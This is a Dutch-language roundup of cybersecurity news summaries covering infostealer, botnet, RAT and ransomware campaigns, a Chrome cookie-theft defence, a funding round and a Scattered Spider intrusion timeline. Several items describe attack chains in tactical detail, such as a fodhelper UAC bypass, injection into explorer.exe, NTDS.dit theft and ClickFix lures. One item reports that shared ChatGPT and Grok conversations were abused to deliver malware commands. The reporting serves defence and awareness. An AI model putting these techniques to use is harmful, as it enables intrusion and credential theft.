Momenteel wordt LummaStealer verspreid via meerdere kanalen, waaronder trojanized software installers, illegale software gedownload van nep sites of torrents, en nep media of game archieven in campagnes die zich richten op landen over de hele wereld. Volgens de onderzoekers is ClickFix een "zeer effectief infectievector in LummaStealer campagnes." Gebruikers krijgen nep CAPTCHA- of verificatiepagina's te zien met gedetailleerde instructies om een kwaadaardig PowerShell commando uit te voeren dat al aan het klembord is toegevoegd. Het commando haalt uiteindelijk een kwaadaardig script op van de server van de aanvaller en voert het uit op de lokale machine. De payload die op deze manier wordt geleverd, was CastleLoader, die in sommige gevallen de LummaStealer info-stealing malware ophaalde en uitvoerde.

Om zich tegen deze dreiging te verdedigen, raden Bitdefender onderzoekers gebruikers aan om het downloaden en uitvoeren van software of media (vooral als het bestand een .EXE extensie heeft) van niet-vertrouwde of onofficiële bronnen te vermijden. Ook is het uitvoeren van commando's die men niet begrijpt in PowerShell of command-line utilities als onderdeel van het verificatieproces van een website een rode vlag voor kwaadaardige activiteit. Het algemene advies is om illegale software (bijv. cracks, "unlocked" tools) uit de weg te gaan en gepromote resultaten op Google Search te verbergen door een ad blocker te gebruiken.

Bron: Bitdefender | Bron 2: wiz.io | Bron 3: recordedfuture.com | Bron 4: tines.com

Het IoT-botnet (Internet of Things) Kimwolf heeft de afgelopen week het Invisible Internet Project (I2P) verstoord, een gedecentraliseerd, versleuteld communicatienetwerk dat is ontworpen om online communicatie te anonimiseren en te beveiligen. I2P-gebruikers meldden verstoringen in het netwerk rond dezelfde tijd dat de beheerders van het Kimwolf-botnet het begonnen te gebruiken om pogingen tot verwijdering van de controle servers van het botnet te ontwijken.

Kimwolf is een botnet dat eind 2025 opdook en snel miljoenen systemen infecteerde, waarbij slecht beveiligde IoT-apparaten zoals tv-streamingboxen, digitale fotolijsten en routers werden omgezet in relays voor kwaadaardig verkeer en DDoS-aanvallen (distributed denial-of-service). I2P is een gedecentraliseerd, privacygericht netwerk dat mensen in staat stelt anoniem te communiceren en informatie te delen. Het leidt data via meerdere versleutelde lagen over vrijwillig beheerde nodes, waardoor de locaties van zowel de verzender als de ontvanger worden verborgen.

Op 3 februari begonnen I2P-gebruikers op de GitHub-pagina van de organisatie te klagen over tienduizenden routers die plotseling het netwerk overweldigden, waardoor bestaande gebruikers niet langer met legitieme nodes konden communiceren. Gebruikers meldden een snel toenemend aantal nieuwe routers dat zich bij het netwerk aansloot en niet in staat was data te verzenden, en dat de massale toestroom van nieuwe systemen het netwerk had overweldigd tot het punt waarop gebruikers geen verbinding meer konden maken.

Op dezelfde dag dat I2P-gebruikers de storingen opmerkten, meldden de individuen die Kimwolf beheren op hun Discord-kanaal dat ze per ongeluk I2P hadden verstoord na een poging om 700.000 met Kimwolf geïnfecteerde bots als nodes op het netwerk aan te sluiten. Hoewel Kimwolf bekend staat als een krachtig wapen voor het lanceren van DDoS-aanvallen, zijn de storingen die deze week zijn veroorzaakt doordat een deel van het botnet probeerde lid te worden van I2P, wat bekend staat als een "Sybil-aanval", een bedreiging in peer-to-peer-netwerken waarbij een enkele entiteit het systeem kan verstoren door een groot aantal valse, pseudonieme identiteiten aan te maken, te beheren en te exploiteren.

Volgens de Wikipedia-pagina van I2P bestaat het netwerk uit ongeveer 55.000 computers die over de hele wereld zijn verspreid, waarbij elke deelnemer fungeert als zowel een router (om verkeer door te geven) als een client. Lance James, oprichter van cybersecurity consultancy Unit 221B en de oorspronkelijke oprichter van I2P, vertelde echter dat het gehele I2P-netwerk nu bestaat uit tussen de 15.000 en 20.000 apparaten op een willekeurige dag.

Benjamin Brundage, oprichter van Synthient, een startup die proxy services volgt en als eerste de unieke verspreidingstechnieken van Kimwolf documenteerde, zei dat de Kimwolf operator(s) hebben geprobeerd een command and control netwerk te bouwen dat niet gemakkelijk kan worden uitgeschakeld door security bedrijven en netwerkoperators die samenwerken om de verspreiding van het botnet te bestrijden. Brundage zei dat de mensen die Kimwolf beheren, hebben geëxperimenteerd met het gebruik van I2P en een vergelijkbaar anonimiteitsnetwerk - Tor - als een back-up command and control netwerk, hoewel er recentelijk geen meldingen zijn geweest van wijdverspreide verstoringen in het Tor-netwerk.

James zei dat het I2P-netwerk nog steeds op ongeveer de helft van zijn normale capaciteit draait, en dat er een nieuwe release wordt uitgerold die de komende week enkele stabiliteitsverbeteringen voor gebruikers zou moeten opleveren. Ondertussen zei Brundage dat het goede nieuws is dat de beheerders van Kimwolf onlangs enkele van hun meer competente ontwikkelaars en operators lijken te hebben vervreemd, wat heeft geleid tot een beginnersfout waardoor het totale aantal botnet systemen met meer dan 600.000 geïnfecteerde systemen is gedaald.

Bron: Krebs on Security | Bron 2: github.com | Bron 3: i2p.net | Bron 4: en.wikipedia.org | Bron 5: unit221b.com

Een geavanceerde aanval richt zich op Windows Server-systemen met behulp van Prometei, een botnet met Russische connecties dat sinds 2016 actief is. Deze multifunctionele malware combineert cryptocurrency mining, diefstal van inloggegevens en mogelijkheden voor bediening op afstand om langdurige toegang tot gecompromitteerde systemen te behouden.

Het Prometei-botnet infiltreert systemen door zwakke of standaard inloggegevens te misbruiken via Remote Desktop Protocol (RDP). Zodra aanvallers toegang hebben, voeren ze een deployment command in twee stappen uit, waarbij Command Prompt en PowerShell worden gecombineerd. De aanval vereist dat de malware een XOR-sleutelbestand (mshlpda32.dll) naar de Windows-directory schrijft, dat vervolgens wordt gebruikt om de belangrijkste payload te decoderen en uit te voeren.

De malware implementeert zichzelf als een Windows-service genaamd "UPlugPlay" en kopieert zichzelf naar C:\Windows\sqhost.exe. Het creëert Windows Firewall-uitzonderingen en Microsoft Defender-uitsluitingen om ononderbroken werking en communicatie met command-and-control (C2)-servers te garanderen. Prometei demonstreert geavanceerde technische mogelijkheden door meerdere lagen van encryptie. De malware gebruikt RC4, LZNT1 en RSA-1024 voor C2-communicatie, waardoor detectie en analyse worden bemoeilijkt.

Het verzamelt uitgebreide systeeminformatie, waaronder computernamen, hardware specificaties, geïnstalleerde antivirussoftware en actieve processen, met behulp van legitieme Windows-tools zoals wmic.exe. Het botnet communiceert met C2-servers via zowel het clear web als het TOR-netwerk om privacy te behouden. Het gebruikt een rolling XOR key-based cipher om de code en datasecties te decoderen, waarbij elke byte een unieke transformatie gebruikt op basis van de positie.

Prometei breidt zijn mogelijkheden uit door modules te downloaden, zoals netdefender.exe, dat mislukte inlogpogingen bewaakt en andere aanvallers blokkeert met behulp van firewallregels. Dit "jealous tenant" gedrag zorgt voor exclusieve toegang voor Prometei-operators door te voorkomen dat andere dreigingsactoren hetzelfde systeem compromitteren. Extra modules omvatten Mimikatz-varianten (miWalk32.exe en miWalk64.exe) voor het verzamelen van inloggegevens, rdpcIip.exe voor laterale beweging met behulp van standaard wachtwoorden, en windrlver.exe voor SSH-gebaseerde verspreiding. De malware bevat ook TOR-proxy modules (msdtc.exe en smcard.exe) om verkeer anoniem te routeren.

Securityesentire-onderzoekers hebben YARA-regels en Python-hulpprogramma's ontwikkeld om Prometei-infecties te detecteren en te analyseren. Organisaties wordt aangeraden sterke wachtwoordbeleidsregels te implementeren, multi-factor authenticatie voor toegang op afstand in te schakelen, account lockout mechanismen te implementeren en RDP-services te controleren op verdachte activiteit. De modulaire architectuur van de malware maakt continue evolutie mogelijk, waarbij modules onafhankelijk worden bijgewerkt. Endpoint Detection and Response (EDR)-oplossingen zijn essentieel voor het identificeren van de complexe procesketens en registerwijzigingen die Prometei-infecties kenmerken. Netwerkmonitoring moet zich richten op ongebruikelijke uitgaande verbindingen naar bekende C2-infrastructuur en TOR exit nodes.

Bron: esentire

Cybercriminelen hebben een geavanceerde aanvalscampagne ontwikkeld waarbij ze het vertrouwen in AI-platforms misbruiken om de Atomic macOS Stealer (AMOS) te verspreiden. Deze nieuwe dreiging combineert legitieme AI-chatbotdiensten van ChatGPT en Grok met betaalde Google-advertenties om nietsvermoedende Mac-gebruikers te verleiden tot het uitvoeren van kwaadaardige terminalcommando's die hun systemen compromitteren.

De campagne richt zich specifiek op personen die zoeken naar oplossingen voor veelvoorkomende problemen, zoals het vrijmaken van schijfruimte op macOS. Ze worden omgeleid naar schijnbaar authentieke, door AI gegenereerde instructies die op vertrouwde domeinen worden gehost. De aanvalsmethode maakt gebruik van een techniek die bekend staat als "ClickFix", waarbij gebruikers worden misleid om handmatig shell-commando's uit te voeren die malware rechtstreeks naar hun apparaten downloaden en installeren.

Wat deze campagne effectief maakt, is het vermogen om traditionele beveiligingsmaatregelen te omzeilen door volledig legitiem te lijken. De kwaadaardige instructies worden namelijk gehost op officiële ChatGPT- en Grok-websites, in plaats van verdachte domeinen van derden.

Na uitvoering begint de AMOS stealer onmiddellijk met het verzamelen van gevoelige informatie, waaronder browserwachtwoorden, seed phrases van cryptocurrency wallets, Keychain-gegevens en persoonlijke bestanden. Deze informatie wordt vervolgens verzonden naar door aanvallers gecontroleerde servers.

Analisten van Flare ontdekten dat aanvallers deelbare AI-chatlinks creëren met stapsgewijze "installatiehandleidingen" die vermomd zijn als legitieme macOS-instructies voor probleemoplossing. Deze gesprekken worden vervolgens via betaalde advertentiecampagnes gepromoot naar de top van de Google-zoekresultaten, waardoor maximale zichtbaarheid wordt gegarandeerd wanneer gebruikers zoeken naar veelvoorkomende technische vragen.

Het infectieproces begint wanneer een Mac-gebruiker een routine Google-zoekopdracht uitvoert voor hulp bij het oplossen van problemen, zoals "schijfruimte vrijmaken op macOS" of soortgelijke technische vragen. Gesponsorde advertenties of hoog gerangschikte organische resultaten leiden slachtoffers naar gedeelde ChatGPT- of Grok-gesprekken die nuttige begeleiding bij systeemonderhoud lijken te bieden.

Deze door AI gegenereerde gesprekken bevatten zorgvuldig opgestelde instructies die gebruikers vragen hun Terminal-applicatie te openen en te plakken wat een onschadelijk commando lijkt. Het kwaadaardige commando downloadt een script van een extern domein dat door de aanvallers wordt beheerd. Dit script vraagt herhaaldelijk om het systeemwachtwoord van de gebruiker onder het mom van legitieme systeemhandelingen.

Zodra de juiste inloggegevens zijn verstrekt, installeert het script de AMOS infostealer, samen met een persistente backdoor die systeemherstarts overleeft en langdurige toegang op afstand tot de gecompromitteerde machine biedt. De malware richt zich onmiddellijk op cryptocurrency wallets, waaronder Electrum, Exodus, Coinbase, MetaMask en Ledger Live, en extraheert seed phrases en private keys die onmiddellijke diefstal van digitale activa mogelijk maken. Daarnaast verzamelt AMOS browsergegevens van Chrome, Safari en Firefox, waaronder opgeslagen wachtwoorden, cookies, autofill-informatie en actieve login-sessies.

Organisaties en individuele Mac-gebruikers moeten controleren op niet-ondertekende applicaties die om systeemwachtwoorden vragen, ongebruikelijke Terminal-activiteit en onverwachte netwerkverbindingen met onbekende domeinen. Beveiligingsteams moeten gebruikers informeren dat instructies die op vertrouwde AI-platforms verschijnen, kunnen worden gecompromitteerd door social engineering. Alle adviezen die om uitvoering van Terminal-commando's vragen, moeten onafhankelijk worden geverifieerd via officiële supportkanalen voordat ze worden geïmplementeerd.

Bron: Flare

Twee geavanceerde ransomware families, BQTLock en GREENBLOOD, zijn opgedoken in het cybersecurity landschap. Ze gebruiken contrasterende strategieën om bedrijfsactiviteiten te verstoren en slachtoffers af te persen. Waar typische ransomware-aanvallen vaak een voorspelbaar patroon volgen van onmiddellijke encryptie, vertonen deze nieuwe varianten een gevaarlijke evolutie in tactiek. BQTLock geeft prioriteit aan stealth en spionage, waardoor de initiële infectie effectief verandert in een datalek risico voordat bestanden worden vergrendeld. GREENBLOOD is daarentegen ontworpen voor pure snelheid en maakt gebruik van de Go programmeertaal om systemen te versleutelen en forensisch bewijs te verwijderen binnen enkele minuten na uitvoering.

De aanvalsvectoren voor deze dreigingen verschillen aanzienlijk in hun operationele doelen. BQTLock werkt in de vroege stadia als een heimelijke surveillance tool en nestelt zich diep in legitieme systeemprocessen om te voorkomen dat beveiligingsalarmen worden geactiveerd. Hierdoor kunnen aanvallers langdurige toegang behouden en gevoelige informatie verzamelen zonder onmiddellijke detectie. GREENBLOOD hanteert een "smash and grab" aanpak, waarbij snelle ChaCha8 encryptie wordt gebruikt om netwerken direct te lamleggen en tegelijkertijd druk wordt uitgeoefend via een TOR-gebaseerde leak site. Deze dualiteit vormt een complexe uitdaging voor verdedigers, die nu rekening moeten houden met zowel langzaam brandende spionage als snelle vernietiging.

Any.Run analisten identificeerden deze verschillende gedragingen tijdens recente sandbox sessies en merkten op dat effectieve containment vereist dat de aanval wordt opgemerkt voordat encryptie plaatsvindt. Door deze chains in een gecontroleerde omgeving te observeren, kunnen security teams overschakelen van reactief herstel naar proactieve containment, waardoor de dreiging wordt gestopt voordat deze voet aan de grond krijgt.

BQTLock onderscheidt zich door een zeer technische infectieketen die is ontworpen om standaard verdedigingen te omzeilen. Na uitvoering eist de malware niet direct losgeld van het apparaat. In plaats daarvan injecteert het een Remcos payload rechtstreeks in explorer.exe, een kern Windows proces. Deze techniek zorgt ervoor dat de kwaadaardige code zich kan voordoen als legitieme systeemactiviteit, waardoor traditionele antivirus tools die standaard besturingssysteem processen vertrouwen, effectief worden misleid. Door zich schuil te houden in het zicht, kunnen de aanvallers door het netwerk navigeren en hun privileges escaleren zonder argwaan te wekken. Om ervoor te zorgen dat het de controle over de gecompromitteerde machine behoudt, voert BQTLock een User Account Control (UAC) bypass uit met behulp van fodhelper.exe. Deze specifieke manoeuvre verleent de malware verhoogde administratieve rechten zonder de gebruiker om toestemming te vragen. Eenmaal verhoogd, vestigt het autorun persistentie, waardoor de kwaadaardige toegang systeem herstarts overleeft. Dit niveau van verschanste toegang stelt de aanvallers in staat om over te gaan naar hun secundaire fase: het stelen van credentials en het vastleggen van schermen om de leverage voor afpersing te maximaliseren.

Security professionals wordt geadviseerd zich te richten op behavioral monitoring in plaats van alleen op statische file signatures. Het detecteren van de specifieke interactie tussen explorer.exe en fodhelper.exe kan dienen als een high-fidelity alert voor deze variant. Organisaties moeten er bovendien voor zorgen dat hun threat intelligence feeds worden bijgewerkt om de unieke command-line argumenten en infrastructuur te herkennen die aan deze nieuwe families zijn gekoppeld om herhaalde infecties te voorkomen.

Bron: ANY.RUN

Indiase defensiesector en overheidsorganisaties zijn het doelwit van meerdere campagnes die ontworpen zijn om Windows- en Linux-omgevingen te compromitteren met remote access trojans (RAT's). Deze RAT's zijn in staat om gevoelige data te stelen en permanente toegang tot geïnfecteerde machines te garanderen. De campagnes kenmerken zich door het gebruik van malware families zoals Geta RAT, Ares RAT en DeskRAT, die vaak worden toegeschreven aan Pakistan-gelieerde dreigingsclusters die bekend staan als SideCopy en APT36 (aka Transparent Tribe). SideCopy, actief sinds minstens 2019, wordt beschouwd als een subgroep van Transparent Tribe.

Aditya K. Sood, vice president of Security Engineering and AI Strategy bij Aryaka, stelt dat Transparent Tribe en SideCopy spionage niet opnieuw uitvinden, maar verfijnen. Door cross-platform dekking uit te breiden, geheugen-resident technieken te gebruiken en te experimenteren met nieuwe delivery vectors, blijft dit ecosysteem onder de radar opereren met behoud van strategische focus.

Kenmerkend voor alle campagnes is het gebruik van phishing e-mails met kwaadaardige attachments of embedded download links die potentiële doelwitten naar door aanvallers gecontroleerde infrastructuur leiden. Deze initiële toegangsmechanismen dienen als conduit voor Windows shortcuts (LNK), ELF binaries en PowerPoint Add-In bestanden die, wanneer geopend, een multi-stage proces starten om de trojans te installeren.

De malware families zijn ontworpen om permanente remote access te bieden, systeemverkenning mogelijk te maken, data te verzamelen, commando's uit te voeren en lange-termijn post-compromise operaties te faciliteren in zowel Windows- als Linux-omgevingen.

Een van de aanvalsketens werkt als volgt: een kwaadaardig LNK-bestand roept "mshta.exe" aan om een HTML Application (HTA) bestand uit te voeren dat gehost wordt op gecompromitteerde legitieme domeinen. De HTA payload bevat JavaScript om een embedded DLL payload te decrypten, die op zijn beurt een embedded data blob verwerkt om een decoy PDF naar de schijf te schrijven, verbinding te maken met een hard-coded command-and-control (C2) server en het opgeslagen decoy bestand weer te geven.

Nadat het decoy document wordt weergegeven, controleert de malware op geïnstalleerde security producten en past het zijn persistence methode dienovereenkomstig aan, alvorens Geta RAT op de gecompromitteerde host te implementeren. Deze aanvalsketen werd eind december 2025 in detail beschreven door CYFIRMA en Seqrite Labs onderzoeker Sathwik Ram Prakki. Geta RAT ondersteunt diverse commando's om systeem informatie te verzamelen, draaiende processen op te sommen, een gespecificeerd proces te beëindigen, geïnstalleerde apps weer te geven, credentials te verzamelen, clipboard inhoud op te halen en te vervangen met door de aanvaller geleverde data, screenshots te maken, bestandsoperaties uit te voeren, willekeurige shell commando's uit te voeren en data te verzamelen van aangesloten USB-apparaten.

Parallel aan deze Windows-gerichte campagne loopt een Linux-variant die een Go binary gebruikt als startpunt om een Python-gebaseerde Ares RAT te installeren door middel van een shell script dat van een externe server wordt gedownload. Net als Geta RAT kan Ares RAT ook een breed scala aan commando's uitvoeren om gevoelige data te verzamelen en Python scripts of commando's uit te voeren die door de threat actor zijn uitgegeven.

Aryaka observeerde ook een andere campagne waarbij de Golang malware, DeskRAT, wordt geleverd via een rogue PowerPoint Add-In bestand dat embedded macro's uitvoert om uitgaande communicatie met een remote server tot stand te brengen om de malware op te halen. APT36's gebruik van DeskRAT werd in oktober 2025 gedocumenteerd door Sekoia en QiAnXin XLab.

Deze campagnes tonen een goed gefinancierde, op spionage gerichte threat actor aan die opzettelijk Indiase defensie-, overheids- en strategische sectoren target via defensie-thema lures, geïmiteerde officiële documenten en regionaal vertrouwde infrastructuur. De activiteit strekt zich uit voorbij defensie tot beleid, onderzoek, kritieke infrastructuur en defensie-gerelateerde organisaties die opereren binnen hetzelfde vertrouwde ecosysteem. De implementatie van DeskRAT, naast Geta RAT en Ares RAT, onderstreept een evoluerende toolkit die is geoptimaliseerd voor stealth, persistence en lange-termijn toegang.

Bron: Google

Onderzoekers hebben 287 extensies voor Google Chrome ontdekt die het browsegedrag van meer dan 37 miljoen gebruikers doorsturen naar externe servers. De onderzoekers maakten gebruik van een man-in-the-middle proxy om te analyseren welk verkeer Google Chrome genereert. Ze installeerden diverse extensies en bezochten verschillende websites. Analyse van het uitgaande verkeer onthulde dat de extensies bijhielden welke websites de gebruikers bezochten en deze informatie naar remote servers stuurden.

Volgens de onderzoekers komt deze data via datahandelaren terecht bij partijen zoals Similarweb. De onderzoekers waarschuwen dat het exfiltreren van data via onschuldig lijkende extensies en het verkopen van deze data aan grote bedrijven een verdienmodel kan zijn. Ze benadrukken dat gebruikers er bij gratis, niet-open source software van uit moeten gaan dat zijzelf het product zijn.

In sommige gevallen is er mogelijk geen sprake van kwaadwilligheid. Zo stuurt een extensie van antivirusbedrijf Avast ook browsegedrag door, wat volgens de onderzoekers nodig kan zijn voor de werking van de extensie.

Bron: Security.NL | Bron 2: contrachrome.com

GitGuardian, een platform voor de beveiliging van geheimen en Non-Human Identities (NHI), heeft een Series C-financieringsronde van $50 miljoen afgesloten. De ronde werd geleid door Insight Partners, samen met Quadrille Capital en bestaande investeerders Balderton, BPI, Eurazeo, Fly Ventures en Sapphire Ventures. Deze investering is bedoeld om de groei van GitGuardian op het gebied van geheimen en AI-agent security te versnellen.

Eric Fourrier, CEO en mede-oprichter van GitGuardian, benadrukt dat organisaties niet langer honderden service accounts beheren, maar duizenden autonome AI-agents, die elk veilige credentials vereisen. Hij stelt dat identity solutions weliswaar zijn ontwikkeld voor menselijke gebruikers, maar dat non-human identities grotendeels onbeheerd blijven. GitGuardian wil zich verder ontwikkelen dan alleen geheimen detectie en zich richten op volledige NHI lifecycle governance, waarbij samenwerking tussen development, security en IAM-teams cruciaal is.

Insight Partners brengt expertise op het gebied van cybersecurity en AI in, met $90 miljard aan beheerd vermogen en investeringen in bedrijven zoals Wiz, SentinelOne en Darktrace. Josh Zelman, Managing Director bij Insight Partners, gelooft dat de aanpak van GitGuardian, die begint bij de plek waar geheimen zich bevinden in de development workflow en uitbreidt naar volledig NHI lifecycle management, cruciaal is nu AI-agents ontwikkelaars snel evenaren.

Quadrille Capital en Eurazeo, beide Europese groeifondsen, positioneren GitGuardian strategisch in EMEA-markten, waar compliance eisen steeds vaker geheimenbeheer en NHI governance vereisen. Romain Stokes, Partner bij Quadrille Capital, stelt dat Europese bedrijven niet alleen code moeten beveiligen, maar ook continue monitoring en audit trails moeten aantonen om te voldoen aan regelgeving zoals GDPR, NIS2 en DORA.

In 2025 beschermde GitGuardian meer dan 115.000 ontwikkelaars, monitorde het continu meer dan 610.000 repositories, verbond het meer dan 210.000 collaboration sources (Slack, Jira, Confluence), detecteerde en herstelde het meer dan 350.000 secret exposures, en sloot 60% van de nieuwe enterprise klanten meerjarige overeenkomsten af. Meer dan 80% van de nieuwe ARR kwam uit Noord-Amerika.

De financiering zal worden ingezet voor AI agent security innovatie, enterprise-scale NHI governance en geografische expansie. GitGuardian wil de detectie, monitoring en governance van credentials die door AI-systemen worden gebruikt, uitbreiden. Het platform zal ook uitgebreide NHI lifecycle management mogelijkheden leveren, inclusief geautomatiseerde discovery, usage analytics, rotation policies en compliance reporting. Daarnaast zal GitGuardian de expansie in de VS versnellen en nieuwe regio's openen, waaronder APAC, Zuid-Amerika en het Midden-Oosten.

Bron: GitGuardian | Bron 2: quadrillecapital.com

Google heeft een nieuwe versie van Chrome, versie 145, uitgebracht die een maatregel bevat om cookiediefstal te voorkomen. Deze maatregel, genaamd Device Bound Session Credentials (DBSC), koppelt de sessie van een ingelogde gebruiker aan het specifieke systeem van die gebruiker. Dit maakt het moeilijker om gestolen session cookies op andere systemen te gebruiken, aldus Google.

Veel internetgebruikers raken besmet met malware die session cookies steelt. Deze cookies geven aan dat de gebruiker op een website of account is ingelogd en worden aangemaakt na het inloggen. Door session cookies te stelen, krijgt een aanvaller direct toegang tot het betreffende account, waardoor het niet nodig is om het wachtwoord te achterhalen of tweefactorauthenticatie te omzeilen.

DBSC koppelt de ingelogde sessie van de gebruiker aan het onderliggende apparaat. Een aanvaller kan dan nog steeds cookies stelen, maar ze niet op zijn eigen systeem gebruiken, omdat ze alleen op het apparaat van de gebruiker werken. De browser maakt een public/private key pair aan op het apparaat en gebruikt het besturingssysteem om de private key op te slaan op een manier dat die lastig te exporteren is, bijvoorbeeld via de Trusted Platform Module (TPM) van de computer.

Voor elke sessie wordt een unieke key gebruikt. DBSC stelt websites niet in staat om keys van verschillende sessies op hetzelfde apparaat te correleren, wat 'persistent user tracking' moet voorkomen. Google claimt dat DBSC geen betekenisvolle informatie over het apparaat lekt. De enige informatie die naar de server wordt gestuurd, is de per-sessie public key, die de server gebruikt om later te controleren of de gebruiker de bijbehorende private key in bezit heeft. Gebruikers kunnen de gemaakte keys op elk moment verwijderen. Wanneer gebruikers geen cookies accepteren, wordt DBSC uitgeschakeld. Google heeft vorig jaar al verschillende tests uitgevoerd met Device Bound Session Credentials. Chrome zal op de meeste systemen automatisch naar versie 145 updaten.

Bron: Google | Bron 2: developer.chrome.com

Pentera Labs heeft een onderzoek uitgevoerd naar het gebruik van training- en demo-applicaties in cloudinfrastructuren. Hierbij werd een terugkerend patroon ontdekt: applicaties die bedoeld waren voor geïsoleerd labgebruik, bleken vaak blootgesteld aan het openbare internet, draaiend binnen actieve cloudaccounts en verbonden met cloudidentiteiten met ruimere toegang dan nodig. Deze applicaties, zoals OWASP Juice Shop, DVWA, Hackazon en bWAPP, zijn ontworpen om inherent onveilig te zijn voor educatieve doeleinden, maar hun blootstelling in live cloudomgevingen vormt een risico.

Het onderzoek toonde aan dat deze applicaties vaak werden geïmplementeerd met standaardconfiguraties, minimale isolatie en te permissieve cloudrollen. Hierdoor konden aanvallers via een blootgestelde training-applicatie toegang krijgen tot actieve cloudidentiteiten en geprivilegieerde rollen, waardoor ze zich verder konden bewegen in de cloudinfrastructuur van de klant. Eenmaal binnen kunnen aanvallers interageren met andere resources binnen dezelfde cloudomgeving, wat de impact van een compromittering aanzienlijk vergroot.

Pentera Labs verifieerde bijna 2.000 live, blootgestelde training-applicatie-instanties, waarvan ongeveer 60% werd gehost op klantbeheerde infrastructuur op AWS, Azure of GCP. Er werd bewijs gevonden van actieve exploitatie, waarbij ongeveer 20% van de instanties artefacten bevatte die door kwaadwillende actoren waren geïmplementeerd, waaronder crypto-mining activiteit, webshells en persistentie mechanismen. Dit duidt op eerdere compromittering en misbruik van blootgestelde systemen.

De blootgestelde omgevingen waren niet beperkt tot kleine testsystemen, maar werden ook waargenomen in cloudomgevingen die zijn gekoppeld aan Fortune 500-organisaties en toonaangevende cybersecurity-leveranciers, waaronder Palo Alto, F5 en Cloudflare. Training- en demo-omgevingen worden vaak als laag risico beschouwd en uitgesloten van standaard security monitoring, toegangscontroles en lifecycle management processen, waardoor ze langdurig blootgesteld kunnen blijven. Het onderzoek toont aan dat exploitatie geen zero-day kwetsbaarheden of geavanceerde aanvalstechnieken vereist; standaard inloggegevens, bekende zwakke punten en publieke blootstelling zijn voldoende.

Noam Yaffe, Senior Security Researcher bij Pentera Labs, benadrukt dat het labelen van een omgeving als "training" of "test" het risico niet vermindert. Wanneer deze systemen zijn blootgesteld aan het internet en verbonden zijn met geprivilegieerde cloudidentiteiten, worden ze onderdeel van het aanvalsoppervlak van de organisatie.

Bron: Pentera

Unit 42 van Palo Alto Networks heeft tijdens een incident response onderzoek in september 2025 een kwaadaardige virtuele machine (VM) ontdekt die vermoedelijk door de cybercrimegroep Muddled Libra (ook bekend als Scattered Spider, UNC3944) werd gebruikt. De inhoud van deze VM en de activiteiten tijdens de aanval bieden inzicht in de operationele werkwijze van deze dreigingsactor.

Muddled Libra creëerde de VM nadat de groep ongeautoriseerde toegang had verkregen tot de VMware vSphere omgeving van het doelwit. De activiteiten tijdens de aanval omvatten:

*   Het uitvoeren van reconnaissance

*   Het downloaden van tools

*   Het vestigen van persistentie via een command and control (C2) kanaal

*   Het gebruiken van gestolen certificaten

*   Het kopiëren van bestanden van de VM naar de domeincontroller (DC) van het doelwit

*   Interactie met de Snowflake infrastructuur van het doelwit

Het onderzoek toonde aan dat de aanvallers ongeveer twee uur na de initiële toegang tot de omgeving van het doelwit, toegang kregen tot de vSphere portal en een nieuwe VM creëerden met de naam "New Virtual Machine". Deze VM werd vervolgens gebruikt als een uitvalsbasis, waarbij de lokale Administrator account werd gebruikt. Kort na het inloggen op de VM downloaden de aanvallers gestolen certificaten en gebruikten deze om tickets te vervalsen. Binnen drie minuten werd persistentie gevestigd met behulp van een SSH tunnel via de Chisel tool, die zich in een ZIP archief (goon.zip) bevond, gehost op een AWS S3 bucket onder controle van de aanvallers.

Ongeveer 15 minuten na het creëren van de VM schakelden de aanvallers via vSphere twee gevirtualiseerde DC's van het doelwit uit. Vervolgens werden de VMDK's van de uitgeschakelde DC's gekoppeld, waardoor de NTDS.dit en SYSTEM registry hive bestanden naar het bureaublad van de Administrator account op de VM gekopieerd konden worden. Ongeveer twee minuten later werden de bestanden result en result.kerb naar het bureaublad geschreven, wat ontcijferde versies van de NTDS.dit Active Directory database bleken te zijn, met hashes van alle gebruikers.

Na ongeveer 30 minuten begon de uitvoering van de Active Directory enumeration tool ADRecon. Er werden tientallen bestanden geassocieerd met ADRecon aangetroffen, waaronder een PowerShell script en output bestanden met informatie over domeindetails, forest trusts, sites, subnets, schema, wachtwoordbeleid, DC's, Service Principal Names (SPN's) en Group Policy Objects (GPO's). De output van ADRecon werd vervolgens in een ZIP archief geplaatst met de naam <VICTIM ORGANISATION>.zip. Ook werd de tool ADExplorer64.exe rechtstreeks van het Microsoft SysInternals domein gedownload.

Een uur later begonnen de aanvallers op het web te zoeken naar verschillende afkortingen die geassocieerd waren met de organisatie van het doelwit, waarschijnlijk om te bepalen welke gegevens gevoelig en interessant zouden kunnen zijn voor exfiltratie. Dit omvatte zoekopdrachten zoals "what is NAIC code" en "NAICS code lookup".

Dertig minuten na hun zoekopdrachten begonnen de aanvallers te interageren met data uit de Snowflake database van het doelwit, die ze ook naar hun VM downloaden. Vervolgens probeerden ze manieren te vinden om de data van hun VM naar een file-sharing site te sturen. Na verschillende pogingen met gangbare file-sharing sites, gebruikten ze Bing om te zoeken op de zinnen "upload files" en "upload files no registration" om een file-sharing site te vinden die niet geblokkeerd was.

Kort na de interactie met de data begonnen de aanvallers met laterale verplaatsing via meerdere gecompromitteerde accounts met hun SSH tunnel, RDP en PsExec. De PsExec tool werd rechtstreeks van het Microsoft SysInternals domein gedownload. Ongeveer vier uur na het creëren van de VM begonnen de aanvallers te zoeken naar aanvullende gevoelige data en gebruikten een gecompromitteerd account om toegang te krijgen tot de mailboxen van andere accounts om een PST bestand te downloaden.

Bron: Unit 42 | Bron 2: github.com | Bron 3: mastodon.social | Bron 4: docs.paloaltonetworks.com

Een gekaperde add-in voor Outlook, genaamd AgreeTo, is gebruikt als een phishing kit om meer dan 4.000 Microsoft account credentials te stelen. De module, oorspronkelijk een legitieme tool voor het inplannen van meetings, was ontwikkeld door een onafhankelijke partij en stond sinds december 2022 in de Microsoft Office Add-in Store. Office add-ins zijn in feite URL's die verwijzen naar content die in Microsoft producten wordt geladen vanaf de server van de ontwikkelaar. In het geval van AgreeTo gebruikte de ontwikkelaar een Vercel-gehoste URL (outlook-one.vercel.app), maar stopte met het project, ondanks het gebruikersbestand dat het had opgebouwd.

De add-in bleef echter in de Microsoft Store staan, waarna een dreigingsactor de URL overnam om een phishing kit te plaatsen. Volgens onderzoekers van supply-chain security bedrijf Koi, heeft de dreigingsactor een nep Microsoft sign-in pagina, een wachtwoord verzamelpagina, een exfiltratie script en een redirect ingezet. Het is belangrijk te benadrukken dat er geen verdere verificatie plaatsvindt nadat een add-in in de Microsoft Store staat. Microsoft beoordeelt het manifestbestand en ondertekent het ter goedkeuring bij het indienen van een module. AgreeTo was al beoordeeld en goedgekeurd, en laadde alle resources, zoals de gebruikersinterface, vanaf de server van de ontwikkelaar, die nu onder controle van de dreigingsactor was.

